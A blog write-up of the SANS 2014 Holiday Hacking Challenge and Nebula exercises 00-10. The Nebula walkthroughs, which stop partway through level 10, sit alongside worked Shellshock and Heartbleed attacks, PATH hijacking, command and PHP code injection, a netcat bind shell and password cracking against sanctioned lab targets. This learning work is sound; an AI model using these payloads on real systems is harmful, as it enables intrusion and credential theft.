SANS Holiday Challenge 2014


This document is a write-up of the SANS 2014 Holiday Hacking Challenge – their 11th installment of this challenge, but the first one that I have participated in. The challenge was named "A Christmas Hacking Carol" and the backstory revolves around a hacker (Scrooge) who used to hack for good but has since lost his path. On Christmas Eve he is visited by three spirits, and each of them delivers a message that is supposed to make him change his ways. Our job is to solve three challenges that reveal what messages were delivered to Scrooge. For the whole story, visit http://pen-testing.sans.org/holiday-challenge/2014.

Challenge One

What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?

The first thing I did was perform an Nmap scan on every port of this system, to see what services the target is running:

image1
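The scan was along these lines (a sketch; the exact flags may differ from the screenshot):

nmap -p- -sV 173.255.233.59     # -p- scans all TCP ports, -sV probes the services found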

The target has a few open ports, but port 31124 seems to be the most interesting one. Nmap doesn’t know what is running on this port but whatever service it is, it is returning data. We can see from the Nmap output that it has a few different responses but the first one is “I AM ELIZA. WHAT’S ON YOUR MIND?” The backstory for this challenge mentioned a ‘friend’ named “Eliza” at this target, so the service on port 31124 was the one I focused on for this challenge.

I connected to the port using netcat, which opened up a conversation for me with Eliza:

image2

There seems to be a program running on port 31124 that takes user input and then responds with a pre-programmed sentence. Based on my initial input (of which there was more than you see in the screenshot), it didn’t look like my input had an effect on what was sent back to me.
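For reference, the connection itself is a netcat one-liner (IP and port from the scan above):

nc 173.255.233.59 31124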

The wrong solution:

It seemed that every response was just random, so I figured I had to ‘break’ the service to get to the secret. I wanted to feed it a lot of input quickly to see if I could figure out some method to the output I was sent, so I issued the following command:

image3

Here I am not actually sending the file line by line. Instead I am sending the entire contents of nmap.lst at once to the service, which makes the response interesting. Instead of sending me just one line back as a response for my input, it sends me several dozens of lines and some of them don’t make sense. For instance, the seventh response I get back is “REALLY—IF IT DOES ANY OF THE COMMENT FOLLOWING COMMENT O INTEGRATES SOURCE CODE FROM?”, which actually includes several words from commented out lines in nmap.lst. These results made me suspect that the program might be vulnerable to code injection.
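The command was roughly the following (a sketch; the wordlist path assumes a default Nmap install):

nc 173.255.233.59 31124 < /usr/share/nmap/nmap.lst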

To find out exactly what lines or characters make the program ‘break’ I again fed it the same file but this time instead of sending the entire file at once I sent it line by line:

image4

The screenshot here is of course only a very small part of the output but the results showed that when fed the wordlist line by line, the program did not respond back to me with nonsensical strings like it did when the entire file was fed to it at once. However, I did notice some interesting responses that I had not seen before, some of which are shown below:

image5

These two responses are clearly not random; they depend on the input that was fed to the program. The first one echoes part of the input back to the user – "it does any of the" – and the second one clearly triggered because my input contained the word "links". These results made me suspect that trying to 'break' the program and attempting code injection was not the way to go. Maybe the responses to my input were not as random as I initially thought, and I just needed to interact with the program to get to the secret.

The right solution:

One of the first questions I asked Eliza was “What is your secret?” The response I got immediately made me realize that interaction with the program, rather than breaking it, was the way to go to solve this challenge. It took me a while to figure out what words or sentences triggered certain responses in the program, but eventually I was able to figure out the most important ones. Below is a screenshot summarizing the conversation between Eliza and myself:

image6

As you can see from this conversation, I had to provide the keyword “secret” three times before Eliza gave me clear instructions on what to do. The first two times I provided a URL, I got a random response back. It wasn’t until after I said “secret” three times, and I included the words “surf” and “url” along with the actual link that Eliza retrieved the website header of the actual page that I sent. I didn’t spend time trying to figure out the logic behind the program, or what keywords and sequences of events are necessary for Eliza to retrieve a website header – it was enough for me that I got it to work.

So now what? The program retrieved a website header from a URL that I provided, but how does that get us the secret? My first guess was that the secret might be included with the GET request that Eliza sends out, and this guess turned out to be correct. I retrieved my website access logs, searched for a request from 173.255.233.59, and found the following:

173.255.233.59 - - [30/Dec/2014:09:27:23 -0700] "GET www.gerbenkleijn.com [REDACTED] Eliza Secret: \"Machines take me by surprise with great frequency. -Alan Turing\"" [REDACTED]
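For the record, finding the entry was a simple grep (the log path assumes a default Apache setup):

grep 173.255.233.59 /var/log/apache2/access.log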

Challenge Two

The second challenge requires us to attack a website and find two secrets there. The website is www.scrooge-and-marley.com and we have permission to attack this site on port 80 and 443. Browsing to the URL shows a fairly simple website with a few pictures, a link or two, and an audio file. Inspecting the source code reveals nothing of interest. There is a phone number listed on the website with an extension: +1 641 715 3900 688365#. Calling this number plays a recorded message (in the same voice as the audio file on the website) that says Scrooge is not available and to please leave a message, which I did not do.

The main page also links to a contact page, with a contact form where a name, email address, and message can be filled out. Immediately I assumed I would have to perform some sort of injection attack here, but after firing up Burpsuite and intercepting a request I noticed that this information is not actually sent to the server.

image7

I suspected that the program ‘submit.sh’ is somehow vulnerable to code injection but I would have to figure out how to inject code into it, since no parameters seem to be passed to the program. Alternatively, it’s possible that the GET request itself is vulnerable to an injection attack and a server command might be executed alongside the ‘submit.sh’ program. These are options that I did explore but before describing my code injection attempts I’ll describe how I obtained the first secret from the website on port 443.

Preliminary tests show that the webserver is running Apache 2.2.22, which is not the most recent version of Apache. This might mean that other services are also not updated to their most recent versions. Since Apache uses OpenSSL for Transport Layer Security (TLS), and older versions of OpenSSL are vulnerable to what has become known as "HeartBleed", I decided to see if that was the case here. First I tried to see if it's possible to easily obtain the version of OpenSSL that the server is using. Some servers provide this information in their communication, and to see if this was the case I issued the following commands:

image8

I did not receive the version of OpenSSL that the server is using – it would have been displayed under the “Server” header. I went ahead and tested for the HeartBleed vulnerability without knowing the version of OpenSSL, since it’s not a requirement for discovery or exploitation of this vulnerability.

Metasploit has an auxiliary scanner module for HeartBleed, which I used against the server. I set "VERBOSE" to true so that the results don't just show whether the server is vulnerable; they also show details about the communication and any information from the server's memory that was compromised.
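In msfconsole the sequence looks roughly like this (the module path is the standard Metasploit one; a sketch):

use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS www.scrooge-and-marley.com
set RPORT 443
set VERBOSE true
run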

image9

The results showed the following:

image10

In the output the secret is clearly visible (URL encoded):

Website Secret#1=Hacking can be noble.

So now let’s focus our attention on the potentially vulnerable shell script ‘submit.sh’. We already saw previously that filling out the contact form and hitting ‘submit’ doesn’t actually send the information to the server, so we can’t just inject some code into the forms and expect it to get executed by ‘submit.sh’.

The Wrong Solutions

First I’ll write about some things I tried that didn’t work. I include this because I learned a lot from the process of failing and hopefully someone else will find reading about my struggles educational as well.

Some testing revealed that it’s also not possible to perform code injection on the GET request itself:

image11

I tried many more forms of injection into the GET request than just the one shown here (URL encoding, using pipes, etc.) but none of them proved successful.

Other scan techniques I tried to get to the secret were running Nikto and running Dirbuster. Nikto showed that the server had "MultiViews" enabled, which could allow for bruteforcing of filenames. Basically, with MultiViews the server will select a file with a matching name even if the extension doesn't match what was requested. This can be used in an attack: if you submit an altered and invalid GET request for a resource, the server will respond with the valid files that match the filename. In the screenshot below I am requesting the file "a", and I changed the "Accept" header from 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' to 'text/html,application/xhtml+xml,application/xml;q=1'. The server responds with a 406 error and shows me all the valid files it has for "a", which are "a.mp3" and "a.ogg":

image12
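The same probe can be reproduced with curl (a sketch of the request in the screenshot):

curl -i -H 'Accept: text/html,application/xhtml+xml,application/xml;q=1' http://www.scrooge-and-marley.com/a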

What I did next was run DirBuster with a custom header, formatted in the same invalid way (you can set these headers under advanced options). I also told DirBuster to use a "blank extension". I let it run for several hours, but it never found additional files beyond what was obviously there: an index page and a contact page, two audio files, four image files, and submit.sh.

image13

The Right Solution

After having tried several methods that didn't get me anywhere, it occurred to me that 'submit.sh' might itself be a hint to the right solution. 'Submit.sh' is a shell script – maybe I should look into exploiting the server through the Shellshock vulnerability.

I had never used the Shellshock exploit before so it took me a little while to get the syntax right. In fact, it took me so long to get it right that I doubted I was on the right path and started looking at other options again. Fortunately, eventually I returned to attempting the Shellshock exploit and I finally succeeded in getting information from the server with the following command:

image14
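The request followed the classic Shellshock pattern: a bash function definition in an HTTP header, with the injected command after the function body. A minimal sketch (the header choice and CGI path are assumptions; the exact command is in the screenshot):

curl -H 'User-Agent: () { :;}; echo; echo vulnerable' http://www.scrooge-and-marley.com/cgi-bin/submit.sh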

Of course, the next commands I tried were 'ls', 'cat', 'whoami', and more basic commands to list files and directories and get information from the server. However, all of these commands returned nothing back to me, not even HTML code. From this I deduced that these server commands were all disabled, and I could only use the most basic of commands to find my way around.

I used 'echo' to find my way through the server's directories and files:

image15

As is clear in the output, there is a file or folder named '/secret'. Clearly that is where we should be looking. I tried to determine whether we were dealing with a file or a folder by issuing the following commands:

image16

Echoing “/secret/*” just echoes the same thing back to me, whereas echoing “/etc/*” gives me a list of files and folders in the /etc/ directory. Based on that difference in output, I deduced that /secret must be a file, not a folder.
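That deduction relies on how bash expands globs: if a wildcard pattern matches nothing, 'echo' simply prints the pattern back literally. A quick local demonstration:

echo /etc/*             # the glob matches, so the directory contents are listed
echo /nonexistent/*     # no match, so bash prints the pattern back literally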

Here’s where we go wrong again for a while. The right solution is a little further down.

Some Google research revealed a way to output file content with the ‘echo’ command, since we don’t have ‘cat’ available:

echo "$(<filename)"

However, trying this on the “/secret” file gave me the following results:

image17

It seems like the server is saying that there is no “/secret” file. To make sure that my command works, I also tried it on “/etc/passwd”:

image18

These results made it seem like the command worked on the “/etc/passwd” file but not on the “/secret” file. Maybe “/secret” wasn’t a file after all. Maybe it’s a folder with a hidden file in it:

image19

The first couple of commands on my local system show that ‘echo’ can reveal hidden files. However, trying the same command on the remote system again only echoed the command back to me, suggesting there are no hidden files. This is where I got stuck for a while. It seems like there is a secret file in the root directory of the web server, but there doesn’t seem to be a way for me to read it….

Eventually I decided not to try a different technique, but instead to try a different tool. I used BurpSuite to issue the exact same command, and to my surprise I got the secret echoed back to me immediately!

image20

There it is!

Website Secret #2: Use your skills for good.

So why did the same command work through BurpSuite and not through curl? I really hate it when something suddenly works and I don't understand why, so I decided to investigate. I went back to curl and set it to use BurpSuite as a proxy, so that I could inspect what was actually being sent to the server. The results are below:

image21

image22

As you can see, I never actually sent the right command to the server. Looking again at my curl command, I immediately felt like an idiot. I was using double quotes inside of double quotes, so I ended my command early. The feedback "bash: /secret: No such file or directory" never came from the remote system; it came from my own system and just happened to appear in the same spot where feedback from the remote system would be! This also explains why the command didn't work for "/secret" but did work for "/etc/passwd": my local system actually has an "/etc/passwd" file.

Once I changed the outer quotation marks to single quotes, the command worked just fine (remember, double quotes inside single quotes are passed along literally, so the payload reaches the remote shell intact):

image23
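In short, the difference between the failing and the working command came down to the outer quotes (a sketch; the header and URL are placeholders):

# Broken: the inner double quotes end the outer string, so $(</secret) is expanded locally
curl -H "User-Agent: () { :;}; echo; echo "$(</secret)"" http://www.scrooge-and-marley.com/cgi-bin/submit.sh

# Working: single quotes deliver the payload to the remote bash untouched
curl -H 'User-Agent: () { :;}; echo; echo "$(</secret)"' http://www.scrooge-and-marley.com/cgi-bin/submit.sh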

Challenge Three

This challenge required the retrieval of four secrets from the contents of a USB drive using forensic investigation techniques. After downloading the file, I inspected it with some of the tools in the Sleuth Kit (TSK). The first thing I did was issue the following command:

image24

This provided me with general information about the USB drive, such as its filesystem (NTFS), serial number, name, cluster size, etc.
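That information comes from TSK's fsstat (the image filename here is a placeholder):

fsstat usb_image.dd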

Next, I wanted to have a look at the contents of the USB drive, so I used another TSK command:

image25

This showed me the allocated and deleted files on the USB drive. The USB drive seems to contain the following files:

  • Hh2014-chat.pcapng
  • Hh2014-chat.pcapng:Bed_Curtains.zip
  • letterfromjacktochuck.doc
  • Tiny_Tom_Crutches_Final.jpg

Two things are interesting to note right off the bat from this list of files. First, Hh2014-chat.pcapng:Bed_Curtains.zip seems to be at the same location on the USB drive as Hh2014-chat.pcapng; the colon separating the first part of the file name from the second part suggests the zip file is hidden in an alternate data stream. Secondly, Tiny_Tom_Crutches_Final.jpg seems to be a deleted file, as indicated by the asterisk in front of the metadata address.

I extracted the files from the USB drive using the following commands:

image26
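The extraction uses TSK's icat with the metadata addresses reported by fls (a sketch; the addresses and image name are placeholders):

icat usb_image.dd 64-128-1 > Hh2014-chat.pcapng          # the pcap's default $DATA attribute
icat usb_image.dd 64-128-2 > Bed_Curtains.zip            # the alternate data stream hiding the zip
icat usb_image.dd 65 > letterfromjacktochuck.doc
icat -r usb_image.dd 66 > Tiny_Tom_Crutches_Final.jpg    # -r attempts recovery of the deleted file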

After some initial inspection of the files I decided to focus on letterfromjacktochuck.doc, because this is a text document. I figured if there was a secret hidden in this document, it might be easier to retrieve than a secret hidden in a jpg file or a network capture. Opening the file didn’t provide me with a secret – true to its file name it just contained a letter from Jack to Chuck. However, the following command showed me that there was actually a secret hidden in the file’s metadata:

image27

USB Secret #1: “Your demise is a source of mirth.”

The second file I investigated was the PCAP file, which I opened using Wireshark. The file contains 2205 packets, sent over a time period of about six minutes. Several different protocols show up throughout the PCAP file, but it quickly became clear that the traffic of interest consists of HTTP POST requests between two clients. The clients are both logged in to a chat service (chat.scrooge-and-marley.com) and messages are posted using the POST method. Filtering to show just the POST requests shows the following conversation between the clients:

10.10.10.124 – "My Darling Husband, I do so appreciate your checking with Mr. Scrooge about the status of our debts. If he would grant us just one more month, we may be able to scrape together enough to meet his minimum payment and stay out of debtor's prison. Please tell me of your progress, my love."

10.10.10.123 – “As promised, I have indeed reached out to Mr. Scrooge to discuss our financial affairs with him, dear.”

10.10.10.124 – “Is it good… or bad?”

10.10.10.123 – “Bad.”

10.10.10.124 – “We are quite ruined.”

10.10.10.123 – “No. There is hope yet, Caroline.”

10.10.10.124 – “If he relents, there is. Nothing is past hope, if such a miracle has happened.”

10.10.10.123 – “He is past relenting. He is dead.”

10.10.10.124 – “That is wondrous news! To whom will our debts be transferred?”

10.10.10.123 – “I don’t know. But before that time we shall be ready with the money. And even if we are not, it would be a bad fortune indeed to find so merciless a creditor in his successor. We may sleep tonight with light hearts, Caroline!”

10.10.10.124 – “I’ve just told our children about Mr. Scrooge’s death, and all of their faces are brighter for it. We now have a very happy house. I so love you.”

10.10.10.123 – “I shall see you soon, my dear. Lovingly – Samuel.”
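(Filtering for just these messages uses Wireshark's standard display filter for POST requests:)

http.request.method == "POST"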

There is no secret hidden in these messages, but while going through the packets I did notice that packet number 2000 and packet number 2105 – both of which were part of this conversation – had comments attached to them.

image28

The comment in packet number 2000 was:

“VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==”

The comment in packet 2105 was:

https://code.google.com/p/f5-steganography/

The second comment is a link to the F5 steganography project, which we will use later to retrieve another secret. The first comment appears to be encoded data. While the encoding could be anything, at first glance it looked like Base64 to me, so I entered the string into an online Base64 decoder. The result revealed the second secret:

image29

“USB Secret #2: Your demise is a source of relief.”
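The same decoding can be done locally; the string is the packet comment quoted above:

echo 'VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==' | base64 -d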

The third file that I decided to investigate was Bed_Curtains.zip which was hidden in the PCAP file. Had I investigated the USB drive using Windows, this file might have been more difficult to find. However, The Sleuth Kit immediately showed me the presence of this file and the necessary information to carve it out.

Unzipping the zip file showed me that a password was required:

image30

In order to get into the zip file I need to find the password. Either the password is hidden somewhere else on the USB drive, or I might be able to bruteforce it using a zip password cracking tool like fcrackzip. I decided to try the second option first.

I ran fcrackzip with smaller password lists first, such as password.lst from John the Ripper and nmap.lst because they don’t take as long to go through as a large password list like rockyou.txt. However, I didn’t find the password until I ran the program with the rockyou password list:

image31
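The invocation was along these lines (a sketch; the wordlist path assumes Kali's default location):

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt Bed_Curtains.zip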

With the password I was able to unzip Bed_Curtains.zip, which gave me the file “Bed_Curtains.png”. This turned out to be an image file of a page in “A Christmas Carol”. The image itself didn’t contain a secret, but running the ‘strings’ command on the image file as was previously done on the text document did reveal the third secret:

image32

“USB Secret #3: Your demise is a source of gain for others.”

This leaves one final file to inspect on the USB drive: Tiny_Tom_Crutches_Final.jpg. Opening the file reveals just a picture of crutches on a table – there is no information in the image itself that leads to the secret. Running the ‘strings’ command on the file also doesn’t reveal any information. I suspected that information was hidden in the file by the use of steganography, especially since a comment in the packet capture file earlier led to a site about the F5 steganography program.

I downloaded and compiled the program ‘stegdetect’ on Kali Linux, and I ran stegdetect on the JPG file.

image33

As you can see from the results, stegdetect found F5 steganography embedded in the JPG file. Assuming there is no password protection, we should be able to use the F5 program to reveal the hidden information in the JPG file. I downloaded the F5 program, which is a Java (.jar) file, and ran it without a password, hoping that no password would be required:

image34

USB Secret #4: "You can prevent much grief and cause much joy. Hack for good, not evil or greed."
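For reference, extraction with the F5 jar looks roughly like this, assuming no password (syntax per the f5-steganography project; the output filename is mine):

java -jar f5.jar x -e hidden.txt Tiny_Tom_Crutches_Final.jpg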

 

 

Exploit Exercises – Nebula

The Exploit Exercises website provides a number of virtual machines that can be downloaded, and each virtual machine presents the user with a different set of exploitation challenges. In this blog post we'll take a look at the challenges in the Nebula virtual machine, which focus on local Linux exploits and source code vulnerabilities. Nebula consists of 20 challenges that get increasingly difficult. At the time of writing I've only made it to challenge 11, and it looks like I'll have to improve my coding abilities before I can make it further. I'll keep updating this blog post as I learn more and complete more challenges.

 

Level00

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. Alternatively, look at the find man page.

Executing the command 'find / -name flag00' reveals an executable – flag00 – located in a hidden directory: /bin/.../. Executing this file elevates the user to the 'flag00' account, at which point the command 'getflag' can be executed.
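A more targeted search would look for SUID files owned by flag00 directly (an alternative to searching by name):

find / -user flag00 -perm -4000 2>/dev/null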

 

Level01

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

Source code for this challenge can be found here.

The flaw in the file is that the command 'echo' is executed using '/usr/bin/env'. Normally the 'echo' command refers to one specific application. Mine refers to '/bin/echo'; you can find yours by typing 'which echo'. However, by using '/usr/bin/env echo' the operating system will actually look for the 'echo' application in the directories specified by the $PATH environment variable. This allows the attacker to modify the $PATH variable and provide a different 'echo' application to be executed.

The attacker can add their home folder to $PATH using the command PATH=/home/level01:$PATH. The home folder now appears in the $PATH variable before any of the other folders, meaning it is the first place where Linux will look. The attacker then adds a file called ‘echo’ with a command inside, such as /bin/getflag and makes the file executable using the command chmod 777 echo. Since the vulnerable program gets executed with the permissions of flag01, so does ‘/bin/getflag’.
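Put together, the attack is only a few commands (a sketch; the vulnerable binary is assumed to live at /home/flag01/flag01):

cd /home/level01
echo '/bin/getflag' > echo        # a fake 'echo' that runs getflag instead
chmod 777 echo                    # make it executable
PATH=/home/level01:$PATH          # our folder is now searched first
/home/flag01/flag01               # the SUID program now runs our fake 'echo'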

 

Level02

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

Source code for this challenge can be found here.

The flaw in the code is that it calls an environment variable that can be changed by the attacker, namely $USER. Normally, $USER holds the name of the current user account. When executing the program, it will echo “level02 is cool”:

level02@nebula:/home/flag02$ ./flag02

about to call system(“/bin/echo level02 is cool”)

level02 is cool

Using the command USER=";getflag;echo" the attacker can inject commands into the string passed to system(). The results are the following:

level02@nebula:/home/flag02$ ./flag02

about to call system(“/bin/echo ;getflag;echo is cool”)

You have successfully executed getflag on a target account

is cool

 

Level03

Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.

The premise of this level is easy enough: a cronjob runs every couple of minutes and executes everything in the '/home/flag03/writable.d' directory. The attacker can create a file, make it executable, place it in the /home/flag03/writable.d directory, and the command(s) will get executed. One thing to keep in mind is that even though you can trigger the job by executing /home/flag03/writable.sh yourself, this will not work, because the job will then run with your (level03) permissions. You need to wait for the task to execute automatically so that it runs with flag03 permissions.

The issue is that the output of the commands will not appear in your shell, so you can't see the result of successfully running the 'getflag' command. You can trust that the command ran, but this is a little anticlimactic. An alternative is that instead of just running 'getflag' you redirect the output to a file, like so:

getflag > /tmp/output.txt

Just make sure that the output gets saved in a location where flag03 has write permissions.
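A complete drop-in script for writable.d would then look like this (a sketch):

#!/bin/bash
# Executed by the flag03 cronjob, so it runs with flag03 permissions.
getflag > /tmp/output.txt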

Of course, if you want to get a shell so that you can manually execute the ‘getflag‘ command there are ways to do that too. One way is to have the script open a local port with netcat and to assign a shell to anyone that connects, using the command:

nc.traditional -l -p 4444 -e /bin/bash

You can then connect remotely to the port and you’ll be given a shell to the system with all the privileges of the flag03 account.

 

Level04

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂

Source code for this challenge can be found here.

The source code for this challenge tells us that the vulnerable program will not open any file that has “token” in the name. The solution here was simple; since we cannot open any file with ‘token’ in the name, we create a hard link to the ‘token’ file with a different name using the command:

ln /home/flag04/token /home/level04/hardlink

We can then execute the ‘flag04’ program on the hardlink, and it will actually run on the token file.

level04@nebula:/home/flag04$ ./flag04 /home/level04/hardlink
06508b5e-8909-4f38-b630-fdb148a848a2

The content of the token file is actually the password to the flag04 account – something that we’ll see again in later challenges. This allows us to log in as flag04 and run the ‘getflag‘ command.

 

 

Level05

Check the flag05 home directory. You are looking for weak directory permissions.

Investigation of the ‘/home/flag05‘ folder shows that there are two hidden directories: ‘.ssh’ and ‘.backup’. The ‘.ssh’ directory typically contains private ssh keys. If we can get our hands on flag05’s private ssh key we should be able to establish an ssh session under flag05’s account without having to enter a password, as long as the private ssh key is not encrypted with a passphrase.

Unfortunately, the ‘/home/flag05/.ssh’ directory has restrictive permissions and the level05 account doesn’t have access to it. Let’s try the ‘/home/flag05/.backup’ directory instead. This directory has a gzipped file in it named ‘backup-19072011.tgz’. The directory and the file have weak permissions set, and the level05 account has access to them. We can copy the file over to our home directory, unzip it, and inspect it.

It turns out that the backup file contains a copy of an RSA private key. We'll continue under the assumption that this is the private key for flag05. It doesn't specifically say that in the file, but since it was found in flag05's home directory it is a safe assumption. We can proceed to copy the file over to our remote system using the following command:

scp backup-19072011 root@<IP ADDRESS>:/root/

In order to establish an ssh session without having to provide a password for flag05, we need to copy the private RSA key into ‘/root/.ssh/id_rsa’. Note that I’m logged into my system as root so that’s where the key goes. If you’re logged in as a different user, use the ‘.ssh’ folder under your home directory instead.

Before copying the private RSA key over, we need to remove some of the other information that was in the backup file. Specifically, everything that is not in between the following lines:

-----BEGIN RSA PRIVATE KEY-----

MIIEowIBAAKCAQEAywCDXFL7nGpgxuT8y8ZYyzif565M6LexECfaRFl6ECQtP2Vp
<MORE LINES>

HWPayRhNBlkmulqTs5GHvLMPjcKMB0k0Xna7QOtBAnzoHpLcrfvBdfRNE1eC87YkPUhmm5hBgG0+TeMmWgr

-----END RSA PRIVATE KEY-----

You may also want to create a backup of the ‘id_rsa‘ file that is already there on your system, so that you can restore it to how it was at a later stage.

cp /root/.ssh/id_rsa /root/.ssh/id_rsa.bak

Once you copy the right content into ‘/root/.ssh/id_rsa’ you can then establish an ssh session under the flag05 account and you will not be prompted for a password:

root@kali:~# ssh flag05@<Exploit Exercises IP Address>

flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

If you are getting an error message while trying to connect, or if you are asked for a passphrase or password, it means there is something wrong with the format of the 'id_rsa' file. Try establishing an ssh session with the '-v' flag for verbose output to troubleshoot the issue.

 

Level06

The flag06 account credentials came from a legacy unix system.

This level requires us to do some basic password cracking. The description for the level tells us we have to inspect flag06’s account credentials, which means we have to look at the ‘/etc/passwd‘ file. The password file clearly shows that the entry for flag06 is different from those for other accounts:

cat /etc/passwd

level05:x:1006:1006::/home/level05:/bin/sh
flag05:x:994:994::/home/flag05:/bin/sh
level06:x:1007:1007::/home/level06:/bin/sh
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
level07:x:1008:1008::/home/level07:/bin/sh
flag07:x:992:992::/home/flag07:/bin/sh

On old UNIX systems, a user’s password hash would be stored in the ‘/etc/passwd’ file, as is the case for flag06. To crack this hash, we simply copy the entry for flag06 over into a file on our system and run John the Ripper (a common password cracking tool) against it.
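Creating the input file for John is a one-liner, copying the passwd entry verbatim:

echo 'flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh' > flag06.pwd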

root@kali:~# john flag06.pwd
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
hello (flag06)
guesses: 1 time: 0:00:00:00 DONE (Sun Nov 16 10:07:08 2014) c/s: 39341 trying: 123456 - Pyramid
Use the "--show" option to display all of the cracked passwords reliably

The password is "hello". We can now ssh into the flag06 account and successfully execute the 'getflag' command.

 

Level07

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

Source code for this challenge can be found here.

There are two files located in the ‘/home/flag07‘ directory: ‘index.cgi’ and ‘thttpd.conf’. The first is a simple Perl script and the second is a configuration file for a web server. Reading the configuration file reveals that the server is running on port 7007 and should be running under the ‘flag07’ user.

Using our remote system to connect to the web server, we determined that index.cgi is accessible to anyone via the link:

http://<webserver>:7007/index.cgi

 The Perl script can be invoked by passing an argument to index.cgi, such as http://<webserver>:7007/index.cgi?Host=127.0.0.1. The source code of the Perl script doesn’t seem to perform any input validation or sanitation, so we should be able to pass more than just a host address to it. By using a pipe, we can pass the script a system command that will also get executed:

http://<webserver>:7007/index.cgi?Host=127.0.0.1|getflag

This provided the message that ‘getflag’ was successfully executed on a target account.

 

Level08

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.

The folder ‘/home/flag08‘ contains a network capture file: ‘capture.pcap’. The easiest way to analyze a PCAP file is using Wireshark, but it’s not the only way. To use Wireshark, copy the PCAP file over to your remote system using the secure copy command (scp). You can also analyze the file on the local system, but instead of Wireshark you’ll have to use tcpdump. Tcpdump is what I’ll use in the walkthrough for this challenge.

tcpdump -qns 0 -X -r capture.pcap

The output won’t be particularly easy to read but once you know what you’re looking for it’s fairly straightforward. The first couple of packets can be ignored – these have to do with establishing the session. What we’re interested in comes after you see the following:

21:23:12.339391 IP 59.233.235.223.12121 > 59.233.235.218.39247: tcp 75
E…..@.@..A;…
;…/Y.O…….t
….K………..
…(..Linux.2.6.
38-8-generic-pae
.(::ffff:10.1.1.
2).(pts/10)…..
wwwbugs.login:.

Note that I removed the hex code and only kept the ASCII for better legibility.

This packet shows that the user was trying to log into a service – there is a clear prompt for a username and password. The next couple of packets will show us the login name that the user entered. However, you won’t see one single packet with a username in it. Instead the traffic looks like telnet traffic, in which a single entered character is sent to the server and the server echoes it back to the user. Additionally, you have to know what part of the packet to look at. The following packets will demonstrate this:

21:23:24.491452 IP 59.233.235.218.39247 > 59.233.235.223.12121: tcp 1

E..5..@.@.J:;…
;….O/Y…t….
…s…………
….l

21:23:24.496998 IP 59.233.235.223.12121 > 59.233.235.218.39247: tcp 2

E..6..@.@…;…
;…/Y.O…….u
…..r……..:.
…..l

21:23:24.591456 IP 59.233.235.218.39247 > 59.233.235.223.12121: tcp 1

E..5..@.@.J8;…
;….O/Y…u….
…s.%……….
..:.e

21:23:24.597002 IP 59.233.235.223.12121 > 59.233.235.218.39247: tcp 2

E..6..@.@…;…
;…/Y.O…….v
…..S……..:.
…..e

As you can see, most of the information in the packets is not of interest to us. Only the last character is what the user actually entered in the command prompt, and this character is echoed back by the server. Going through the next few packets shows us that the user entered ‘level8’ as their username.

Skipping a few packets, we can then see the server prompting the user for a password:

21:23:26.095219 IP 59.233.235.223.12121 > 59.233.235.218.39247: tcp 13

E..A..@.@..w;…
;…/Y.O…….{
….’………<b
…….Password:
.

The password was more difficult to decipher than the username was. First of all, the server doesn’t echo anything back like with the username, most likely as a security measure – you often don’t get to see the password as you’re typing it in so as to avoid someone shoulder surfing you. This is not necessarily an issue but it makes it a little bit harder to figure out what the user sent and what the server received.

The first part of the password was easy enough: ‘backdoor’. However, after backdoor there is a series of messages sent between the user and the server that doesn’t seem to contain anything, except some periods. Then there are a few more packets with legible characters: ‘00Rm8’. Then there are some more periods, and finally the user sends three more characters to the server: ‘ate’.

After going through the file a few more times, I finally deduced that what the user sent to the server in its entirety was: 'backdoor…00Rm8.ate'. From that string, it's easy to figure out that a period represents a backspace – the user made a couple of mistakes while typing in the password and corrected them. Therefore, the password that was sent to the server was 'backd00Rmate'.

This password allows for logging in to the Nebula box as the flag08 account, at which point you can successfully execute the ‘getflag’ command.

 

Level09

There’s a C setuid wrapper for some vulnerable PHP code…

Source code for this challenge can be found here.

There are two files under ‘/home/flag09‘: an executable called ‘flag09’, and a PHP sourcecode file called ‘flag09.php’ which is called by ‘flag09’ when executed. The PHP script calls a function that takes two parameters from the command line, although it only actually uses the first one. The first parameter is supposed to be the path to a file. The contents of that file will be modified in the function according to some regex and then output to the screen.

The function uses the PHP built-in function 'preg_replace()' to modify how it outputs the file contents. If it encounters any lines that include the string "[email" it then calls another function – spam() – by use of the '/e' modifier. The preg_replace() function with the '/e' modifier is open to potential exploitation. You can read about this vulnerability here: https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace.

We have to do two things to exploit this vulnerability: we have to set the value of the '$use_me' variable, and we have to reference it inside a file while making sure that it gets executed when the spam() function is called. The first part is easy; the PHP script sets $use_me to whatever our second argument on the command line is. Then we have to call it. I created a file in '/home/level09' called "test.txt" with the following content:

[email system($use_me)]

I then ran the ‘flag09’ file as follows:

/home/flag09/flag09 /home/level09/test.txt getflag

The results:

level09@nebula:~$ System(getflag).

Apparently I was successfully referencing the $use_me variable, but the system command itself was not being executed. In order for this command to be interpreted and executed as a system command, it has to be wrapped in curly braces. After some experimentation, the following syntax worked for me:

[email {${system($use_me)}}]

Again executing the flag09 program with the same command line arguments now resulted in the following:

level09@nebula:~$ /home/flag09/flag09 /home/level09/test.txt getflag
You have successfully executed getflag on a target account
PHP Notice: Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

Despite an error thrown by the script because the code injection affects its interpretation of PHP code, the getflag command was successfully executed.

 

Level10

The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call.

Source code for this challenge can be found here.

The source code for level 10 outlines a program that takes two command line arguments. The first one is a file path, and the second one is a host to send the file to. If the user has access to the file, the program writes the contents of it to port 18211 on the specified host.

